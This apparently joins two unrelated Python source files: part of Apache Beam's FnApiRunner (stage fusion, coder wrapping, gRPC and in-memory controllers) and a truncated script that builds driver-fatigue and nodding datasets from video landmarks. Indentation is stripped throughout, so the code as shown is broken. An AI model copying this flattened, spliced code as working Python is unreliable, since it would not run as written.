for coder_id, coder_proto in coders.items():
if coder_proto.spec.spec.urn == urns.BYTES_CODER:
bytes_coder_id = coder_id
break
else:
bytes_coder_id = unique_name(coders, 'bytes_coder')
pipeline_components.coders[bytes_coder_id].CopyFrom(
beam.coders.BytesCoder().to_runner_api(None))
coder_substitutions = {}
def wrap_unknown_coders(coder_id, with_bytes):
if (coder_id, with_bytes) not in coder_substitutions:
wrapped_coder_id = None
coder_proto = coders[coder_id]
if coder_proto.spec.spec.urn == urns.LENGTH_PREFIX_CODER:
coder_substitutions[coder_id, with_bytes] = (
bytes_coder_id if with_bytes else coder_id)
elif coder_proto.spec.spec.urn in good_coder_urns:
wrapped_components = [wrap_unknown_coders(c, with_bytes)
for c in coder_proto.component_coder_ids]
if wrapped_components == list(coder_proto.component_coder_ids):
# Use as is.
coder_substitutions[coder_id, with_bytes] = coder_id
else:
wrapped_coder_id = unique_name(
coders,
coder_id + ("_bytes" if with_bytes else "_len_prefix"))
coders[wrapped_coder_id].CopyFrom(coder_proto)
coders[wrapped_coder_id].component_coder_ids[:] = [
wrap_unknown_coders(c, with_bytes)
for c in coder_proto.component_coder_ids]
coder_substitutions[coder_id, with_bytes] = wrapped_coder_id
else:
# Not a known coder.
if with_bytes:
coder_substitutions[coder_id, with_bytes] = bytes_coder_id
else:
wrapped_coder_id = unique_name(coders, coder_id + "_len_prefix")
len_prefix_coder_proto = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=urns.LENGTH_PREFIX_CODER)),
component_coder_ids=[coder_id])
coders[wrapped_coder_id].CopyFrom(len_prefix_coder_proto)
coder_substitutions[coder_id, with_bytes] = wrapped_coder_id
# This operation is idempotent.
if wrapped_coder_id:
coder_substitutions[wrapped_coder_id, with_bytes] = wrapped_coder_id
return coder_substitutions[coder_id, with_bytes]
def fix_pcoll_coder(pcoll):
new_coder_id = wrap_unknown_coders(pcoll.coder_id, False)
safe_coders[new_coder_id] = wrap_unknown_coders(pcoll.coder_id, True)
pcoll.coder_id = new_coder_id
for stage in stages:
assert len(stage.transforms) == 1
transform = stage.transforms[0]
if transform.spec.urn == urns.GROUP_BY_KEY_TRANSFORM:
for pcoll_id in transform.inputs.values():
fix_pcoll_coder(pipeline_components.pcollections[pcoll_id])
for pcoll_id in transform.outputs.values():
fix_pcoll_coder(pipeline_components.pcollections[pcoll_id])
# This is used later to correlate the read and write.
param = str("group:%s" % stage.name)
gbk_write = Stage(
transform.unique_name + '/Write',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Write',
inputs=transform.inputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=param))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
yield gbk_write
yield Stage(
transform.unique_name + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Read',
outputs=transform.outputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=param))],
downstream_side_inputs=frozenset(),
must_follow=union(frozenset([gbk_write]), stage.must_follow))
else:
yield stage
def sink_flattens(stages):
"""Sink flattens and remove them from the graph.
A flatten that cannot be sunk/fused away becomes multiple writes (to the
same logical sink) followed by a read.
"""
# TODO(robertwb): Actually attempt to sink rather than always materialize.
# TODO(robertwb): Possibly fuse this into one of the stages.
pcollections = pipeline_components.pcollections
for stage in stages:
assert len(stage.transforms) == 1
transform = stage.transforms[0]
if transform.spec.urn == urns.FLATTEN_TRANSFORM:
# This is used later to correlate the read and writes.
param = str("materialize:%s" % transform.unique_name)
output_pcoll_id, = transform.outputs.values()
output_coder_id = pcollections[output_pcoll_id].coder_id
flatten_writes = []
for local_in, pcoll_in in transform.inputs.items():
if pcollections[pcoll_in].coder_id != output_coder_id:
# Flatten inputs must all be written with the same coder as is
# used to read them.
pcollections[pcoll_in].coder_id = output_coder_id
transcoded_pcollection = (
transform.unique_name + '/Transcode/' + local_in + '/out')
yield Stage(
transform.unique_name + '/Transcode/' + local_in,
[beam_runner_api_pb2.PTransform(
unique_name=
transform.unique_name + '/Transcode/' + local_in,
inputs={local_in: pcoll_in},
outputs={'out': transcoded_pcollection},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.IDENTITY_DOFN_URN))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
pcollections[transcoded_pcollection].CopyFrom(
pcollections[pcoll_in])
pcollections[transcoded_pcollection].coder_id = output_coder_id
else:
transcoded_pcollection = pcoll_in
flatten_write = Stage(
transform.unique_name + '/Write/' + local_in,
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Write/' + local_in,
inputs={local_in: transcoded_pcollection},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=param))],
downstream_side_inputs=frozenset(),
must_follow=stage.must_follow)
flatten_writes.append(flatten_write)
yield flatten_write
yield Stage(
transform.unique_name + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Read',
outputs=transform.outputs,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=param))],
downstream_side_inputs=frozenset(),
must_follow=union(frozenset(flatten_writes), stage.must_follow))
else:
yield stage
def annotate_downstream_side_inputs(stages):
"""Annotate each stage with fusion-prohibiting information.
Each stage is annotated with the (transitive) set of pcollections that
depend on this stage that are also used later in the pipeline as a
side input.
While theoretically this could result in O(n^2) annotations, the size of
each set is bounded by the number of side inputs (typically much smaller
than the number of total nodes) and the number of *distinct* side-input
sets is also generally small (and shared due to the use of union
defined above).
This representation is also amenable to simple recomputation on fusion.
"""
consumers = collections.defaultdict(list)
all_side_inputs = set()
for stage in stages:
for transform in stage.transforms:
for input in transform.inputs.values():
consumers[input].append(stage)
for si in stage.side_inputs():
all_side_inputs.add(si)
all_side_inputs = frozenset(all_side_inputs)
downstream_side_inputs_by_stage = {}
def compute_downstream_side_inputs(stage):
if stage not in downstream_side_inputs_by_stage:
downstream_side_inputs = frozenset()
for transform in stage.transforms:
for output in transform.outputs.values():
if output in all_side_inputs:
downstream_side_inputs = union(downstream_side_inputs, output)
for consumer in consumers[output]:
downstream_side_inputs = union(
downstream_side_inputs,
compute_downstream_side_inputs(consumer))
downstream_side_inputs_by_stage[stage] = downstream_side_inputs
return downstream_side_inputs_by_stage[stage]
for stage in stages:
stage.downstream_side_inputs = compute_downstream_side_inputs(stage)
return stages
def greedily_fuse(stages):
"""Places transforms sharing an edge in the same stage, whenever possible.
"""
producers_by_pcoll = {}
consumers_by_pcoll = collections.defaultdict(list)
# Used to always reference the correct stage as the producer and
# consumer maps are not updated when stages are fused away.
replacements = {}
def replacement(s):
old_ss = []
while s in replacements:
old_ss.append(s)
s = replacements[s]
for old_s in old_ss[:-1]:
replacements[old_s] = s
return s
def fuse(producer, consumer):
fused = producer.fuse(consumer)
replacements[producer] = fused
replacements[consumer] = fused
# First record the producers and consumers of each PCollection.
for stage in stages:
for transform in stage.transforms:
for input in transform.inputs.values():
consumers_by_pcoll[input].append(stage)
for output in transform.outputs.values():
producers_by_pcoll[output] = stage
logging.debug('consumers\n%s', consumers_by_pcoll)
logging.debug('producers\n%s', producers_by_pcoll)
# Now try to fuse away all pcollections.
for pcoll, producer in producers_by_pcoll.items():
pcoll_as_param = str("materialize:%s" % pcoll)
write_pcoll = None
for consumer in consumers_by_pcoll[pcoll]:
producer = replacement(producer)
consumer = replacement(consumer)
# Update consumer.must_follow set, as it's used in can_fuse.
consumer.must_follow = set(
replacement(s) for s in consumer.must_follow)
if producer.can_fuse(consumer):
fuse(producer, consumer)
else:
# If we can't fuse, do a read + write.
if write_pcoll is None:
write_pcoll = Stage(
pcoll + '/Write',
[beam_runner_api_pb2.PTransform(
unique_name=pcoll + '/Write',
inputs={'in': pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=pcoll_as_param))])
fuse(producer, write_pcoll)
if consumer.has_as_main_input(pcoll):
read_pcoll = Stage(
pcoll + '/Read',
[beam_runner_api_pb2.PTransform(
unique_name=pcoll + '/Read',
outputs={'out': pcoll},
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=pcoll_as_param))],
must_follow={write_pcoll})
fuse(read_pcoll, consumer)
# Everything that was originally a stage or a replacement, but wasn't
# replaced, should be in the final graph.
final_stages = frozenset(stages).union(replacements.values()).difference(
replacements.keys())
for stage in final_stages:
# Update all references to their final values before throwing
# the replacement data away.
stage.must_follow = frozenset(replacement(s) for s in stage.must_follow)
# Two reads of the same stage may have been fused. This is unneeded.
stage.deduplicate_read()
return final_stages
def sort_stages(stages):
"""Order stages suitable for sequential execution.
"""
seen = set()
ordered = []
def process(stage):
if stage not in seen:
seen.add(stage)
for prev in stage.must_follow:
process(prev)
ordered.append(stage)
for stage in stages:
process(stage)
return ordered
# Now actually apply the operations.
pipeline_components = copy.deepcopy(pipeline_proto.components)
# Reify coders.
# TODO(BEAM-2717): Remove once Coders are already in proto.
coders = pipeline_context.PipelineContext(pipeline_components).coders
for pcoll in pipeline_components.pcollections.values():
if pcoll.coder_id not in coders:
window_coder = coders[
pipeline_components.windowing_strategies[
pcoll.windowing_strategy_id].window_coder_id]
coder = WindowedValueCoder(
registry.get_coder(pickler.loads(pcoll.coder_id)),
window_coder=window_coder)
pcoll.coder_id = coders.get_id(coder)
coders.populate_map(pipeline_components.coders)
known_composites = set([urns.GROUP_BY_KEY_TRANSFORM])
def leaf_transforms(root_ids):
for root_id in root_ids:
root = pipeline_proto.components.transforms[root_id]
if root.spec.urn in known_composites or not root.subtransforms:
yield root_id
else:
for leaf in leaf_transforms(root.subtransforms):
yield leaf
# Initial set of stages are singleton leaf transforms.
stages = [
Stage(name, [pipeline_proto.components.transforms[name]])
for name in leaf_transforms(pipeline_proto.root_transform_ids)]
# Apply each phase in order.
for phase in [
annotate_downstream_side_inputs, expand_gbk, sink_flattens,
greedily_fuse, sort_stages]:
logging.info('%s %s %s', '=' * 20, phase, '=' * 20)
stages = list(phase(stages))
logging.debug('Stages: %s', [str(s) for s in stages])
# Return the (possibly mutated) context and ordered set of stages.
return pipeline_components, stages, safe_coders
def run_stages(self, pipeline_components, stages, safe_coders):
if self._use_grpc:
controller = FnApiRunner.GrpcController(self._sdk_harness_factory)
else:
controller = FnApiRunner.DirectController()
metrics_by_stage = {}
try:
pcoll_buffers = collections.defaultdict(list)
for stage in stages:
metrics_by_stage[stage.name] = self.run_stage(
controller, pipeline_components, stage,
pcoll_buffers, safe_coders).process_bundle.metrics
finally:
controller.close()
return RunnerResult(PipelineState.DONE, metrics_by_stage)
def run_stage(
self, controller, pipeline_components, stage, pcoll_buffers, safe_coders):
context = pipeline_context.PipelineContext(pipeline_components)
data_operation_spec = controller.data_operation_spec()
def extract_endpoints(stage):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data_operation_spec.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
pcoll_id = transform.spec.payload
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
data_input[target] = pcoll_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
else:
raise NotImplementedError
if data_operation_spec:
transform.spec.payload = data_operation_spec.SerializeToString()
else:
transform.spec.payload = ""
return data_input, data_side_input, data_output
logging.info('Running %s', stage.name)
logging.debug(' %s', stage)
data_input, data_side_input, data_output = extract_endpoints(stage)
if data_side_input:
raise NotImplementedError('Side inputs.')
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
instruction_id=self._next_uid(),
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[process_bundle_descriptor]))
process_bundle = beam_fn_api_pb2.InstructionRequest(
instruction_id=self._next_uid(),
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_reference=
process_bundle_descriptor.id))
# Write all the input data to the channel.
for (transform_id, name), pcoll_id in data_input.items():
data_out = controller.data_plane_handler.output_stream(
process_bundle.instruction_id, beam_fn_api_pb2.Target(
primitive_transform_reference=transform_id, name=name))
for element_data in pcoll_buffers[pcoll_id]:
data_out.write(element_data)
data_out.close()
# Register and start running the bundle.
controller.control_handler.push(process_bundle_registration)
controller.control_handler.push(process_bundle)
# Wait for the bundle to finish.
while True:
result = controller.control_handler.pull()
if result and result.instruction_id == process_bundle.instruction_id:
if result.error:
raise RuntimeError(result.error)
break
# Gather all output data.
expected_targets = [
beam_fn_api_pb2.Target(primitive_transform_reference=transform_id,
name=output_name)
for (transform_id, output_name), _ in data_output.items()]
for output in controller.data_plane_handler.input_elements(
process_bundle.instruction_id, expected_targets):
target_tuple = (
output.target.primitive_transform_reference, output.target.name)
if target_tuple in data_output:
pcoll_id = data_output[target_tuple]
if pcoll_id.startswith('materialize:'):
# Just store the data chunks for replay.
pcoll_buffers[pcoll_id].append(output.data)
elif pcoll_id.startswith('group:'):
# This is a grouping write, create a grouping buffer if needed.
if pcoll_id not in pcoll_buffers:
original_gbk_transform = pcoll_id.split(':', 1)[1]
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(transform_proto.inputs.values())
output_pcoll = only_element(transform_proto.outputs.values())
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[pcoll_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
pcoll_buffers[pcoll_id].append(output.data)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(pcoll_id)
return result
# This is the "old" way of executing pipelines.
# TODO(robertwb): Remove once runner API supports side inputs.
def _map_task_registration(self, map_task, state_handler,
data_operation_spec):
input_data, side_input_data, runner_sinks, process_bundle_descriptor = (
self._map_task_to_protos(map_task, data_operation_spec))
# Side inputs will be accessed over the state API.
for key, elements_data in side_input_data.items():
state_key = beam_fn_api_pb2.StateKey.MultimapSideInput(key=key)
state_handler.Clear(state_key)
state_handler.Append(state_key, [elements_data])
return beam_fn_api_pb2.InstructionRequest(
instruction_id=self._next_uid(),
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[process_bundle_descriptor])
), runner_sinks, input_data
def _map_task_to_protos(self, map_task, data_operation_spec):
input_data = {}
side_input_data = {}
runner_sinks = {}
context = pipeline_context.PipelineContext()
transform_protos = {}
used_pcollections = {}
def uniquify(*names):
# An injective mapping from string* to string.
return ':'.join("%s:%d" % (name, len(name)) for name in names)
def pcollection_id(op_ix, out_ix):
if (op_ix, out_ix) not in used_pcollections:
used_pcollections[op_ix, out_ix] = uniquify(
map_task[op_ix][0], 'out', str(out_ix))
return used_pcollections[op_ix, out_ix]
def get_inputs(op):
if hasattr(op, 'inputs'):
inputs = op.inputs
elif hasattr(op, 'input'):
inputs = [op.input]
else:
inputs = []
return {'in%s' % ix: pcollection_id(*input)
for ix, input in enumerate(inputs)}
def get_outputs(op_ix):
op = map_task[op_ix][1]
return {tag: pcollection_id(op_ix, out_ix)
for out_ix, tag in enumerate(getattr(op, 'output_tags', ['out']))}
for op_ix, (stage_name, operation) in enumerate(map_task):
transform_id = uniquify(stage_name)
if isinstance(operation, operation_specs.WorkerInMemoryWrite):
# Write this data back to the runner.
target_name = only_element(get_inputs(operation).keys())
runner_sinks[(transform_id, target_name)] = operation
transform_spec = beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_OUTPUT_URN,
payload=data_operation_spec.SerializeToString() \
if data_operation_spec is not None else None)
elif isinstance(operation, operation_specs.WorkerRead):
# A Read from an in-memory source is done over the data plane.
if (isinstance(operation.source.source,
maptask_executor_runner.InMemorySource)
and isinstance(operation.source.source.default_output_coder(),
WindowedValueCoder)):
target_name = only_element(get_outputs(op_ix).keys())
input_data[(transform_id, target_name)] = self._reencode_elements(
operation.source.source.read(None),
operation.source.source.default_output_coder())
transform_spec = beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=data_operation_spec.SerializeToString() \
if data_operation_spec is not None else None)
else:
# Otherwise serialize the source and execute it there.
# TODO: Use SDFs with an initial impulse.
# The Dataflow runner harness strips the base64 encoding. Do the same
# here until we get the same thing back that we sent in.
source_bytes = base64.b64decode(
pickler.dumps(operation.source.source))
transform_spec = beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.PYTHON_SOURCE_URN,
payload=source_bytes)
elif isinstance(operation, operation_specs.WorkerDoFn):
# Record the contents of each side input for access via the state api.
side_input_extras = []
for si in operation.side_inputs:
assert isinstance(si.source, iobase.BoundedSource)
element_coder = si.source.default_output_coder()
# TODO(robertwb): Actually flesh out the ViewFn API.
side_input_extras.append((si.tag, element_coder))
side_input_data[
bundle_processor.side_input_tag(transform_id, si.tag)] = (
self._reencode_elements(
si.source.read(si.source.get_range_tracker(None, None)),
element_coder))
augmented_serialized_fn = pickler.dumps(
(operation.serialized_fn, side_input_extras))
transform_spec = beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.PYTHON_DOFN_URN,
payload=augmented_serialized_fn)
elif isinstance(operation, operation_specs.WorkerFlatten):
# Flatten is nice and simple.
transform_spec = beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.IDENTITY_DOFN_URN)
else:
raise NotImplementedError(operation)
transform_protos[transform_id] = beam_runner_api_pb2.PTransform(
unique_name=stage_name,
spec=transform_spec,
inputs=get_inputs(operation),
outputs=get_outputs(op_ix))
pcollection_protos = {
name: beam_runner_api_pb2.PCollection(
unique_name=name,
coder_id=context.coders.get_id(
map_task[op_id][1].output_coders[out_id]))
for (op_id, out_id), name in used_pcollections.items()
}
# Must follow creation of pcollection_protos to capture used coders.
context_proto = context.to_runner_api()
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms=transform_protos,
pcollections=pcollection_protos,
coders=dict(context_proto.coders.items()),
windowing_strategies=dict(context_proto.windowing_strategies.items()),
environments=dict(context_proto.environments.items()))
return input_data, side_input_data, runner_sinks, process_bundle_descriptor
def _run_map_task(
self, map_task, control_handler, state_handler, data_plane_handler,
data_operation_spec):
registration, sinks, input_data = self._map_task_registration(
map_task, state_handler, data_operation_spec)
control_handler.push(registration)
process_bundle = beam_fn_api_pb2.InstructionRequest(
instruction_id=self._next_uid(),
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_reference=registration.register.
process_bundle_descriptor[0].id))
for (transform_id, name), elements in input_data.items():
data_out = data_plane_handler.output_stream(
process_bundle.instruction_id, beam_fn_api_pb2.Target(
primitive_transform_reference=transform_id, name=name))
data_out.write(elements)
data_out.close()
control_handler.push(process_bundle)
while True:
result = control_handler.pull()
if result.instruction_id == process_bundle.instruction_id:
if result.error:
raise RuntimeError(result.error)
expected_targets = [
beam_fn_api_pb2.Target(primitive_transform_reference=transform_id,
name=output_name)
for (transform_id, output_name), _ in sinks.items()]
for output in data_plane_handler.input_elements(
process_bundle.instruction_id, expected_targets):
target_tuple = (
output.target.primitive_transform_reference, output.target.name)
if target_tuple not in sinks:
# Unconsumed output.
continue
sink_op = sinks[target_tuple]
coder = sink_op.output_coders[0]
input_stream = create_InputStream(output.data)
elements = []
while input_stream.size() > 0:
elements.append(coder.get_impl().decode_from_stream(
input_stream, True))
if not sink_op.write_windowed_values:
elements = [e.value for e in elements]
for e in elements:
sink_op.output_buffer.append(e)
return
def execute_map_tasks(self, ordered_map_tasks, direct=False):
if direct:
controller = FnApiRunner.DirectController()
else:
controller = FnApiRunner.GrpcController()
try:
for _, map_task in ordered_map_tasks:
logging.info('Running %s', map_task)
self._run_map_task(
map_task, controller.control_handler, controller.state_handler,
controller.data_plane_handler, controller.data_operation_spec())
finally:
controller.close()
@staticmethod
def _reencode_elements(elements, element_coder):
output_stream = create_OutputStream()
for element in elements:
element_coder.get_impl().encode_to_stream(element, output_stream, True)
return output_stream.get()
# These classes are used to interact with the worker.
class SimpleState(object): # TODO(robertwb): Inherit from GRPC servicer.
def __init__(self):
self._all = collections.defaultdict(list)
def Get(self, state_key):
return beam_fn_api_pb2.Elements.Data(
data=''.join(self._all[self._to_key(state_key)]))
def Append(self, state_key, data):
self._all[self._to_key(state_key)].extend(data)
def Clear(self, state_key):
try:
del self._all[self._to_key(state_key)]
except KeyError:
pass
@staticmethod
def _to_key(state_key):
return state_key.window, state_key.key
class DirectController(object):
"""An in-memory controller for fn API control, state and data planes."""
def __init__(self):
self._responses = []
self.state_handler = FnApiRunner.SimpleState()
self.control_handler = self
self.data_plane_handler = data_plane.InMemoryDataChannel()
self.worker = sdk_worker.SdkWorker(
self.state_handler, data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()))
def push(self, request):
logging.info('CONTROL REQUEST %s', request)
response = self.worker.do_instruction(request)
logging.info('CONTROL RESPONSE %s', response)
self._responses.append(response)
def pull(self):
return self._responses.pop(0)
def done(self):
pass
def close(self):
pass
def data_operation_spec(self):
return None
class GrpcController(object):
"""An grpc based controller for fn API control, state and data planes."""
def __init__(self, sdk_harness_factory=None):
self.sdk_harness_factory = sdk_harness_factory
self.state_handler = FnApiRunner.SimpleState()
self.control_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10))
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.data_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.control_handler = streaming_rpc_handler(
beam_fn_api_pb2_grpc.BeamFnControlServicer, 'Control')
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
self.data_plane_handler = data_plane.GrpcServerDataChannel()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
logging.info('starting control server on port %s', self.control_port)
logging.info('starting data server on port %s', self.data_port)
self.data_server.start()
self.control_server.start()
self.worker = (self.sdk_harness_factory or sdk_worker.SdkHarness)(
'localhost:%s' % self.control_port)
self.worker_thread = threading.Thread(target=self.worker.run)
logging.info('starting worker')
self.worker_thread.start()
def data_operation_spec(self):
url = 'localhost:%s' % self.data_port
remote_grpc_port = beam_fn_api_pb2.RemoteGrpcPort()
remote_grpc_port.api_service_descriptor.url = url
return remote_grpc_port
def close(self):
self.control_handler.done()
self.worker_thread.join()
self.data_plane_handler.close()
self.control_server.stop(5).wait()
self.data_server.stop(5).wait()
class RunnerResult(maptask_executor_runner.WorkerRunnerResult):
def __init__(self, state, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._metrics_by_stage = metrics_by_stage
def only_element(iterable):
element, = iterable
return element
def unique_name(existing, prefix):
if prefix in existing:
counter = 0
while True:
counter += 1
prefix_counter = prefix + "_%s" % counter
if prefix_counter not in existing:
return prefix_counter
else:
return prefix
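# Illustrative sanity check for the two helpers above (not part of the original
# module; guarded so it never runs on import):
if __name__ == '__main__':
    assert only_element([42]) == 42
    assert unique_name({'a'}, 'b') == 'b'
    assert unique_name({'a', 'a_1'}, 'a') == 'a_2'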
|
generate_datasets_from_testreal.py
|
# -*- coding: UTF-8 -*-
'''=================================================
@Author :zhenyu.yang
@Date :2020/11/5 11:37 AM
=================================================='''
import sys
sys.path.append('./')
sys.path.insert(0,'/data/zhenyu.yang/modules')
import cv2
import json
import numpy as np
import random
import copy
from multiprocessing import Process
import os
def getFiles(path, suffix):
return [os.path.join(root, file) for root, dirs, files in os.walk(path)
for file in files if file.endswith(suffix)]
def get_ear(ldmk):
eps = 1e-5
get_distance = lambda x,y:((x[0]-y[0])**2 + (x[1]-y[1])**2 + eps)**0.5
w = get_distance(ldmk[0],ldmk[4])
h = get_distance(ldmk[2],ldmk[6])
ear = h/w
ear = min(ear,0.7)
return ear
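# Worked example (made-up numbers): with eye corners 30 px apart (w) and lids
# 9 px apart (h), get_ear returns 9/30 = 0.3; smaller ratios correspond to a
# more closed eye, and the value is capped at 0.7.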
def get_ear_height(ldmk):
heights = [ldmk[2][1]-ldmk[6][1],ldmk[1][1]-ldmk[7][1],ldmk[3][1]-ldmk[5][1]]
return np.mean(np.abs(heights))
def get_fea_label(img_info):
eye_center = [-1,-1]
if 'ldmk' in img_info and img_info['ldmk'] is not None and len(img_info['ldmk']) > 4:
ldmk = np.array(img_info['ldmk'])
eye_ldmk = ldmk[36:47]
x,y = np.mean(eye_ldmk,axis= 0)
eye_center = [x,y]
return eye_center
def get_perclose(height_list):
max_height = max(height_list)
preclose_list = [1 - v/max_height for v in height_list]
preclose_50 = sum(v > 0.5 for v in preclose_list)
preclose_70 = sum(v > 0.7 for v in preclose_list)
preclose_90 = sum(v > 0.9 for v in preclose_list)
return [preclose_50,preclose_70,preclose_90]
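# Worked example (illustrative heights): for height_list = [10, 4, 2, 1, 10] the
# per-frame closure ratios are [0.0, 0.6, 0.8, 0.9, 0.0], so get_perclose returns
# [3, 2, 0]: three frames above 50% closure, two above 70%, none above 90%.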
def get_eye_movement(height_list):
height_change = [abs(height_list[i+1] - height_list[i]) for i in range(len(height_list)-1)]
return sum(v>1 for v in height_change) / len(height_list)
def list2num(slice_list):
num_list = []
for slice in slice_list:
num_list.extend(list(range(slice[0], slice[1] + 1)))
return num_list
def is_stretch(stretch_list,left_index,right_index):
# 1 : stretch 0: normal -1 : ignore
max_union = -1
frame_len = right_index - left_index
for stretch in stretch_list:
stretch_len = abs(stretch[1] - stretch[0])
temp_left = max(left_index,stretch[0])
temp_right = min(right_index,stretch[1])
if [temp_left,temp_right] in [stretch,[left_index,right_index]]:
return 1
union = (temp_right - temp_left) /( min(stretch_len,frame_len) + 0.1)
max_union = max(max_union,union)
if max_union < 0.1:
return 0
return -1
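# Illustrative example (made-up frame indices): with stretch_list = [[100, 150]],
# the window (110, 140) lies entirely inside a labelled stretch and returns 1,
# the window (300, 360) has no overlap and returns 0, and the window (140, 200)
# overlaps only partially and returns -1 (ignored).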
def min_is_nodding(x_list,threshold):
if sum(v!=-1 for v in x_list) == 0 :
return 0
if x_list[len(x_list)//2] == -1:
return 0
_x = x_list[len(x_list)//2]
x_list = [v for v in x_list if v != -1]
if max(x_list) - min(x_list) > threshold and _x in [max(x_list), min(x_list)]:
return 1
return 0
def is_nodding(x_list,half_frame_len = 8,threshold = 4):
ans = []
for i in range(half_frame_len, len(x_list) - half_frame_len):
ans.append(min_is_nodding(x_list[i-half_frame_len:i+half_frame_len],threshold))
return sum(ans)
def get_batch_data(video_list,suffix,dst_dir,time_len = 10):
random.shuffle(video_list)
half_frame_len = time_len*25//2
half_frame_len = 40
while True:
if len(video_list) == 0:
break
video_path = video_list.pop()
video_suffix = '.mp4'
if video_path.endswith('.mp4'):
video_suffix = '.mp4'
elif video_path.endswith('.avi'):
video_suffix = '.avi'
json_path = video_path.replace(video_suffix, suffix)
if not os.path.exists(json_path):
continue
stretch_path = video_path.replace(os.path.basename(video_path), 'nodding.json')
if not os.path.exists(stretch_path):
continue
with open(stretch_path, 'r') as f:
stretch_list = json.load(f)
try:
stretch_list = stretch_list[os.path.basename(video_path).replace(video_suffix,'')]
except:
continue
with open(json_path, 'r') as f:
big_json = f.readlines()
skeleton_list = []
for json_info in big_json:
try:
json_info = json.loads(json_info.strip())
except:
continue
skeleton_list.append(get_fea_label(json_info))
for stretch in stretch_list:
stretch = list(map(int,stretch))
temp_eye_list = skeleton_list[stretch[0]:stretch[1]]
temp_eye_list.append(1)
frame_id = sum(stretch)//2
npy_name = '_'.join(video_path.split(os.sep)[-4:]).replace(video_suffix,'')
npy_name = '{}__{}__{}.json'.format(1, npy_name, frame_id)
with open(os.path.join(dst_dir, npy_name), 'w') as f:
json.dump(temp_eye_list, f)
temp_count = 0
for i in range(10000*len(stretch_list)):
frame_id = int(random.random()*len(skeleton_list))
if frame_id < half_frame_len or frame_id >= len(skeleton_list) - (half_frame_len+1):
continue
temp_stretch = is_stretch(stretch_list,frame_id-half_frame_len,frame_id+half_frame_len)
if temp_stretch != 0:
continue
temp_count += 1
temp_eye_list = skeleton_list[frame_id-half_frame_len:frame_id+half_frame_len]
temp_eye_list.append(0)
npy_name = '_'.join(video_path.split(os.sep)[-4:]).replace(video_suffix,'')
npy_name = '{}__{}__{}.json'.format(0, npy_name, frame_id)
with open(os.path.join(dst_dir, npy_name), 'w') as f:
json.dump(temp_eye_list, f)
if temp_count > len(stretch_list):
break
def split(input,num=60):
random.shuffle(input)
ans = []
sep = len(input) //num
for i in range(num-1):
ans.append(input[i*sep:(i+1)*sep])
ans.append(input[(num-1)*sep:])
return ans
if __name__ == '__main__':
version = 'v0.1'
suffix = '_{}.json'.format(version)
src_dir_dict = {'train':'/data/weiyu.li/DMSData/FatigueView/raw_video',
'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
}
src_dir_dict = {'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
}
